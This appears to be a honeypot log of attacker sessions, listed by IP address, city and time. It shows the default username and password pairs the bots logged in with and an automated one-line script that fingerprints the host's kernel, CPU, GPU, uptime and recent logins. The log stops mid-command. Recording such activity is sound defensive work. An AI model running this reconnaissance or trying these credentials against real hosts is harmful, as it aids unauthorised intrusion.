$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 spice_root_13 (206.189.131.68) — Bengaluru, India · 1 session · 4 cmds

2026-03-03 09:38 EST · as root/qwerty

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 scone_root_18 (144.126.227.246) — Slough, United Kingdom · 1 session · 1 cmd

2026-03-03 09:32 EST · as root/admin

hostname discovery

$ hostname

↳ hostname discovery

🎭 tiger_root_8 (64.227.183.80) — Bengaluru, India · 2 sessions · 8 cmds

2026-03-03 09:06 EST · as pi/raspberry, ubuntu/ubuntu

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 strudel_root_15 (134.209.251.51) — Frankfurt am Main, Germany · 6 sessions · 24 cmds

2026-03-03 08:57 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 reef_root_6 (170.64.160.35) — Sydney, Australia · 6 sessions · 24 cmds

2026-03-03 09:05 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 clog_root_4 (209.38.105.157) — Amsterdam, Netherlands · 3 sessions · 12 cmds

2026-03-03 09:00 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 bike_root_12 (68.183.6.140) — Amsterdam, Netherlands · 5 sessions · 20 cmds

2026-03-03 09:00 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 dutch_root_6 (167.172.38.77) — Amsterdam, Netherlands · 5 sessions · 20 cmds

2026-03-03 08:07 EST · as admin/admin, admin/admin123, admin/password

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 burger_root_13 (165.245.135.16) — Douglasville, United States · 1 session · 4 cmds

2026-03-03 08:29 EST · as root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 crumpet_root_12 (209.97.142.126) — Slough, United Kingdom · 4 sessions · 16 cmds

2026-03-03 08:09 EST · as admin/admin123, root/1234, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 spice_root_14 (165.22.208.88) — Bengaluru, India · 3 sessions · 12 cmds

2026-03-03 08:06 EST · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 barbie_root_8 (170.64.133.77) — Sydney, Australia · 3 sessions · 12 cmds

2026-03-03 07:45 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 spice_root_15 (168.144.29.65) — Bengaluru, India · 4 sessions · 16 cmds

2026-03-03 07:43 EST · as root/admin, root/admin123, root/qwerty

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 tiger_root_9 (159.65.144.246) — Bengaluru, India · 1 session · 4 cmds

2026-03-03 07:46 EST · as root/qwerty

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 tulip_root_16 (209.38.43.129) — Amsterdam, Netherlands · 2 sessions · 8 cmds

2026-03-03 07:37 EST · as root/12345678, root/admin

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 stein_root_11 (164.92.128.97) — Frankfurt am Main, Germany · 7 sessions · 28 cmds

2026-03-03 05:05 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 star_root_20 (147.182.203.36) — Santa Clara, United States · 6 sessions · 24 cmds

2026-03-03 05:15 EST · as root/1234, root/12345678, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 stroopwafel_root_9 (178.128.251.17) — Amsterdam, Netherlands · 3 sessions · 12 cmds

2026-03-03 05:06 EST · as admin/admin, root/1234, root/12345678

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 